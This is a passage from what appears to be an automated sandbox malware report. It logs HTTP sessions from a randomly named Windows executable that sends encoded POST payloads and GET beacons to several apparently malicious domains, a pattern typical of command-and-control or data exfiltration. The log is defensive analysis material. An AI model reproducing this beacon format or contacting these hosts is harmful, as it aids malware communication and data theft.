Oct 31, 2024 10:27:36.804124117 CET	571	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDZiNjNkMDYtNTVhOC00OGE2LWJkNGUtOTIyN2M0NDEyYmRlIiwicGFnZV90aW1lIjoxNzMwMzY2OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	50014	199.59.243.227	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:38.739355087 CET	457	OUT	GET /7n9v/?w6=2vdPP&1Zgl=5Ps3YXPo0Vj4JhRGre7eusiYM6VqaJdXpTrzI5rt8FAfia/wVGxKw+cKGzuZcepElfg31D2wj7kRRQ+omDm5eEZM56pgjuD4M6hDNIlUQpNxKD0Ll6OMyYftw5tyQwWC0A== HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.rebel.tienda User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:27:39.344731092 CET	1236	IN	HTTP/1.1 200 OK date: Thu, 31 Oct 2024 09:27:38 GMT content-type: text/html; charset=utf-8 content-length: 1474 x-request-id: 08948371-5efe-454d-8389-7bba94738a1a cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j2JvvG4Lgs7flnfMp5I+I2afM1nEdI04bE1Zn1bVaGw3+xZcMbtiJSDuorrKo7YkpVfBIX5B4qNNYKPh4nm7Aw== set-cookie: parking_session=08948371-5efe-454d-8389-7bba94738a1a; expires=Thu, 31 Oct 2024 09:42:39 GMT; path=/ connection: close Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6a 32 4a 76 76 47 34 4c 67 73 37 66 6c 6e 66 4d 70 35 49 2b 49 32 61 66 4d 31 6e 45 64 49 30 34 62 45 31 5a 6e 31 62 56 61 47 77 33 2b 78 5a 63 4d 62 74 69 4a 53 44 75 6f 72 72 4b 6f 37 59 6b 70 56 66 42 49 58 35 42 34 71 4e 4e 59 4b 50 68 34 6e 6d 37 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_j2JvvG4Lgs7flnfMp5I+I2afM1nEdI04bE1Zn1bVaGw3+xZcMbtiJSDuorrKo7YkpVfBIX5B4qNNYKPh4nm7Aw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 31, 2024 10:27:39.344789028 CET	927	IN	Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDg5NDgzNzEtNWVmZS00NTRkLTgzODktN2JiYTk0NzM4YTFhIiwicGFnZV90aW1lIjoxNzMwMzY2OD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	50015	13.248.169.48	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:44.450997114 CET	710	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 74 50 36 49 2f 57 4d 71 2f 67 56 45 35 59 4a 61 51 45 38 48 66 65 43 6b 55 42 68 66 71 50 30 36 76 4b 6b 70 6d 6a 6e 4c 2f 77 71 43 74 34 50 6e 52 6f 73 76 48 42 72 5a 49 62 47 45 6a 44 70 2f 4a 49 6e 2f 78 54 77 52 79 32 75 56 48 70 56 66 55 42 46 74 70 73 77 56 5a 52 73 31 67 4a 2b 67 69 58 50 69 68 66 50 2b 2b 79 77 58 51 73 44 74 6a 64 4d 5a 70 4f 46 4a 55 74 49 66 6a 32 52 63 4d 6b 45 61 43 59 7a 75 65 67 6b 39 70 79 34 47 63 76 34 4e 4d 4c 53 71 6d 52 47 76 4a 59 45 34 79 50 68 67 65 42 61 39 69 33 72 2b 4c 63 6a 4c 36 56 4b 4d 4f 6a 57 35 73 34 45 3d Data Ascii: 1Zgl=Uo5VWlPpoEXKtP6I/WMq/gVE5YJaQE8HfeCkUBhfqP06vKkpmjnL/wqCt4PnRosvHBrZIbGEjDp/JIn/xTwRy2uVHpVfUBFtpswVZRs1gJ+giXPihfP++ywXQsDtjdMZpOFJUtIfj2RcMkEaCYzuegk9py4Gcv4NMLSqmRGvJYE4yPhgeBa9i3r+LcjL6VKMOjW5s4E=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	50016	13.248.169.48	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:46.989578962 CET	730	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 38 41 36 76 76 41 70 70 43 6e 4c 36 77 71 43 6d 59 50 69 56 6f 73 53 48 47 69 75 49 65 47 45 6a 43 4e 2f 4a 4b 76 2f 74 31 34 51 79 6d 75 58 53 35 56 52 62 68 46 74 70 73 77 56 5a 52 6f 62 67 4a 47 67 69 6d 2f 69 69 36 37 39 34 43 77 59 52 73 44 74 77 4e 4e 65 70 4f 46 2f 55 6f 51 6d 6a 77 64 63 4d 6b 30 61 42 4b 62 74 48 51 6c 32 6e 53 34 52 5a 4e 52 57 46 35 75 55 75 41 32 70 58 2b 56 5a 7a 35 51 4b 45 6a 53 56 78 58 48 47 62 50 72 38 72 6c 72 6c 55 41 47 4a 79 76 54 6a 33 31 48 41 43 4d 4c 49 51 31 31 4d 64 65 4a 6a 34 7a 54 72 Data Ascii: 1Zgl=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp8A6vvAppCnL6wqCmYPiVosSHGiuIeGEjCN/JKv/t14QymuXS5VRbhFtpswVZRobgJGgim/ii6794CwYRsDtwNNepOF/UoQmjwdcMk0aBKbtHQl2nS4RZNRWF5uUuA2pX+VZz5QKEjSVxXHGbPr8rlrlUAGJyvTj31HACMLIQ11MdeJj4zTr

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	50017	13.248.169.48	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:49.537592888 CET	1747	OUT	POST /izfe/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.ila.beauty Origin: http://www.ila.beauty Referer: http://www.ila.beauty/izfe/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 55 6f 35 56 57 6c 50 70 6f 45 58 4b 2f 39 75 49 39 31 30 71 6f 77 56 44 67 6f 4a 61 61 6b 38 44 66 65 2b 6b 55 46 59 55 70 39 34 36 76 39 49 70 6d 41 50 4c 39 77 71 43 6c 59 50 6a 56 6f 73 44 48 41 4b 71 49 65 44 2f 6a 41 46 2f 4a 76 37 2f 39 41 59 51 6e 57 75 58 51 35 56 51 55 42 46 43 70 71 51 52 5a 51 59 62 67 4a 47 67 69 6c 6e 69 31 2f 50 39 6a 43 77 58 51 73 44 62 6a 64 4e 36 70 4f 63 4b 55 6f 63 70 69 41 39 63 4d 41 51 61 48 35 7a 74 4f 51 6c 30 79 53 35 55 5a 4e 4e 7a 46 39 50 6e 75 41 7a 2b 58 35 35 5a 2b 75 39 55 42 33 57 51 76 47 65 6e 63 49 6a 52 32 6a 61 47 53 7a 43 4a 30 65 2f 52 71 31 76 4a 44 61 6e 37 45 45 49 47 48 34 59 33 33 48 36 7a 47 69 54 4f 63 51 48 78 79 54 73 43 47 51 50 34 4b 4b 55 65 59 57 54 48 36 6d 43 50 6c 37 6a 6d 75 4b 6b 59 48 49 6b 47 51 4b 77 4b 4e 4a 79 70 39 51 4f 33 6d 35 54 69 62 45 69 58 42 42 66 6f 6b 37 76 6a 76 6c 2f 71 4a 76 62 66 4d 7a 51 2f 75 76 57 34 56 31 66 64 47 71 57 47 33 73 32 50 76 61 2b 78 48 33 6e 65 7a 61 34 31 4a 48 73 57 35 [TRUNCATED] Data Ascii: 1Zgl=Uo5VWlPpoEXK/9uI910qowVDgoJaak8Dfe+kUFYUp946v9IpmAPL9wqClYPjVosDHAKqIeD/jAF/Jv7/9AYQnWuXQ5VQUBFCpqQRZQYbgJGgilni1/P9jCwXQsDbjdN6pOcKUocpiA9cMAQaH5ztOQl0yS5UZNNzF9PnuAz+X55Z+u9UB3WQvGencIjR2jaGSzCJ0e/Rq1vJDan7EEIGH4Y33H6zGiTOcQHxyTsCGQP4KKUeYWTH6mCPl7jmuKkYHIkGQKwKNJyp9QO3m5TibEiXBBfok7vjvl/qJvbfMzQ/uvW4V1fdGqWG3s2Pva+xH3neza41JHsW5YeeVdeI3JeWqQ3nNT1TaxOyoycV54cZPB9/Y6tGuE9jduOMxGC/ljpdPHstJDQRKv7ZZCMQXMbE00dJcKR53Pgafme41LwXVt4xupnwV0jKd7qXDefKLB1FwJzaAcTVW+bsuWiL1LJ8AEOs6hA8nXL4y6KJD5caruDG6zSsTRG76pC5TwQLjtFqK/VJum9Dgs52qeY2J8Fp3zO7ExazuX+X+qyCCKDJn8ECU2E0YnB2Z1q36nxW+EjqBKLJqOEuH2uVsFgZcNXYWGD6pU8fjTpgf9zZcskld/qMH5S091ebo1rt3etTPCnlHbsbmNcvryTyj3wThVeUJlzaruMVg6h02+oo/XJr6NCwy8v0Do34srIzdsQvspowmMCxOB3Ryq/HuwMS8UWnAIio+CRhu67ybwGwesfl85FqWCD5eXS0HNJ6ArxiyPZbceovjQXngemjVpnWzT0DOHDfUyEDw0JxCLKZeD668lX7b1cDOYXgQC8IuaGQx5NrsQ0Gi22cH3OxrsXom+itJxoBhQ1bhjsWBg7qWFWLLbZfiDSSiXqSJF61n2aUKu1PfAi6UPRQwbZgDGiigikB32K3eOvQ/e+xMPklbj32r1pEV7q9O1tQ4lTevOyxN+92F75dfN1g57ZTPhTqqQhppuIzxJ7Cd4jauVoGccKAJNn [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	50018	13.248.169.48	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:27:52.081629992 CET	455	OUT	GET /izfe/?1Zgl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&w6=2vdPP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.ila.beauty User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
Oct 31, 2024 10:27:52.737041950 CET	401	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 31 Oct 2024 09:27:52 GMT Content-Type: text/html Content-Length: 261 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 31 5a 67 6c 3d 5a 71 52 31 56 53 61 75 2f 6e 6a 78 74 38 79 61 39 46 59 64 72 69 73 52 6e 50 77 45 53 52 38 50 57 4b 2b 6f 46 51 63 56 71 73 55 75 37 64 45 4e 6d 77 61 55 6f 47 4c 53 73 35 76 79 53 34 46 68 51 47 47 6c 42 36 72 38 68 48 74 77 54 59 66 4b 38 68 31 32 33 33 53 55 53 59 35 2b 66 41 49 78 6e 4c 45 41 50 78 4e 70 6d 70 75 66 6a 6c 4b 47 33 62 6e 67 38 43 56 73 4b 73 47 4e 79 62 63 55 31 67 3d 3d 26 77 36 3d 32 76 64 50 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?1Zgl=ZqR1VSau/njxt8ya9FYdrisRnPwESR8PWK+oFQcVqsUu7dENmwaUoGLSs5vyS4FhQGGlB6r8hHtwTYfK8h1233SUSY5+fAIxnLEAPxNpmpufjlKG3bng8CVsKsGNybcU1g==&w6=2vdPP"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	50019	38.88.82.56	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:01.943365097 CET	731	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 205 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 70 6b 5a 35 33 43 70 46 75 69 66 4d 36 47 56 62 55 66 66 6b 67 4c 63 56 74 78 7a 53 53 2f 6b 62 4c 56 6a 39 53 57 73 75 42 36 61 75 4f 69 79 76 74 67 55 41 73 68 76 74 67 46 77 71 2f 59 4b 70 4d 5a 69 68 41 58 76 69 6f 54 47 31 4d 49 38 58 52 58 50 4e 6d 5a 30 56 41 65 2b 49 47 33 47 30 54 74 69 4b 2f 71 79 72 6c 7a 30 57 6f 55 66 46 67 4f 45 34 6f 46 54 78 4f 63 63 4b 46 2f 6e 63 71 71 51 7a 6f 2f 30 31 44 58 2f 6c 6d 64 64 53 36 49 65 45 2f 38 38 55 67 66 76 2b 59 4d 65 42 4e 31 62 4c 36 68 39 4f 30 38 54 50 44 78 34 2b 46 37 41 63 44 2f 73 64 41 78 34 3d Data Ascii: 1Zgl=3iLjkEAo5UEVpkZ53CpFuifM6GVbUffkgLcVtxzSS/kbLVj9SWsuB6auOiyvtgUAshvtgFwq/YKpMZihAXvioTG1MI8XRXPNmZ0VAe+IG3G0TtiK/qyrlz0WoUfFgOE4oFTxOccKF/ncqqQzo/01DX/lmddS6IeE/88Ugfv+YMeBN1bL6h9O08TPDx4+F7AcD/sdAx4=
Oct 31, 2024 10:28:02.645801067 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:02 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Oct 31, 2024 10:28:02.645853996 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	50020	38.88.82.56	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:04.492122889 CET	751	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 225 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 51 62 4b 31 54 39 44 6b 49 75 43 36 61 75 46 43 79 71 7a 51 56 4d 73 68 6a 66 67 48 6b 71 2f 5a 71 70 4d 63 47 68 41 6b 48 6a 70 44 47 33 45 6f 38 56 66 33 50 4e 6d 5a 30 56 41 66 62 64 47 33 75 30 53 63 53 4b 2f 4c 79 6f 6f 54 30 58 2b 45 66 46 78 65 45 38 6f 46 53 4c 4f 5a 45 73 46 36 72 63 71 72 41 7a 6f 75 30 71 4b 58 2f 6e 6c 74 64 47 2b 34 44 4a 6d 61 67 35 71 38 4b 33 41 74 2b 35 46 6a 71 68 67 44 31 6d 6e 63 2f 33 54 69 77 4a 55 4c 68 31 5a 63 38 74 65 6d 76 41 77 2f 37 6e 6a 74 78 38 76 5a 49 4a 42 56 6c 69 48 6c 47 65 Data Ascii: 1Zgl=3iLjkEAo5UEVrHR5nRBFvCfL5GVbf/fogLQVt1rCSNQbK1T9DkIuC6auFCyqzQVMshjfgHkq/ZqpMcGhAkHjpDG3Eo8Vf3PNmZ0VAfbdG3u0ScSK/LyooT0X+EfFxeE8oFSLOZEsF6rcqrAzou0qKX/nltdG+4DJmag5q8K3At+5FjqhgD1mnc/3TiwJULh1Zc8temvAw/7njtx8vZIJBVliHlGe
Oct 31, 2024 10:28:05.192243099 CET	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 31 Oct 2024 09:28:05 GMT Server: Apache Last-Modified: Wed, 30 Oct 2024 18:34:18 GMT ETag: "49d-625b5f32466a6" Accept-Ranges: bytes Content-Length: 1181 Content-Type: text/html Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 [TRUNCATED] Data Ascii: <!DOCTYPE html><html><head> <title>404 Error</title></head><body style="background:white;"> <style type="text/css"> .speachbubble { position: relative; width: 250px; height: 105px; padding: 0px; background: black; background: linear-gradient(to bottom, rgba(135,135,135,1) 0%,rgba(0,0,0,1) 100%); border-radius: 8px; margin:auto; margin-top:100px;}.speachbubble:after { content: ""; position: absolute; bottom: -18px; left: 102px; border-style: solid; border-width: 18px 21px 0; border-color: black transparent; display: block; width: 0; z-index: 1;}.speachbubble span { display:block; margin:auto; text-align:center; font:72px arial; color:white; padding-top:10px; text-shadow: 4px 4px 2px rgba(0, 0, 0, .3);}.message { font:24px arial; color:black; text-align:center; margin-top:40px; text-shadow: 2
Oct 31, 2024 10:28:05.192290068 CET	185	IN	Data Raw: 70 78 20 32 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 32 29 3b 0d 0a 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 20 0d 0a 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 65 61 63 68 62 75 62 62 6c 65 22 3e 3c 73 70 61 6e 3e 34 Data Ascii: px 2px 2px rgba(0, 0, 0, .2);}</style> <div class="speachbubble"><span>404</span></div><div class="message">Error: 404 - File Not Found</div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	50021	38.88.82.56	80	4508	C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe

Timestamp	Bytes transferred	Direction	Data
Oct 31, 2024 10:28:07.040473938 CET	1768	OUT	POST /lk0h/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Cache-Control: no-cache Connection: close Host: www.college-help.info Origin: http://www.college-help.info Referer: http://www.college-help.info/lk0h/ User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2 Data Raw: 31 5a 67 6c 3d 33 69 4c 6a 6b 45 41 6f 35 55 45 56 72 48 52 35 6e 52 42 46 76 43 66 4c 35 47 56 62 66 2f 66 6f 67 4c 51 56 74 31 72 43 53 4e 6f 62 4c 45 7a 39 53 30 30 75 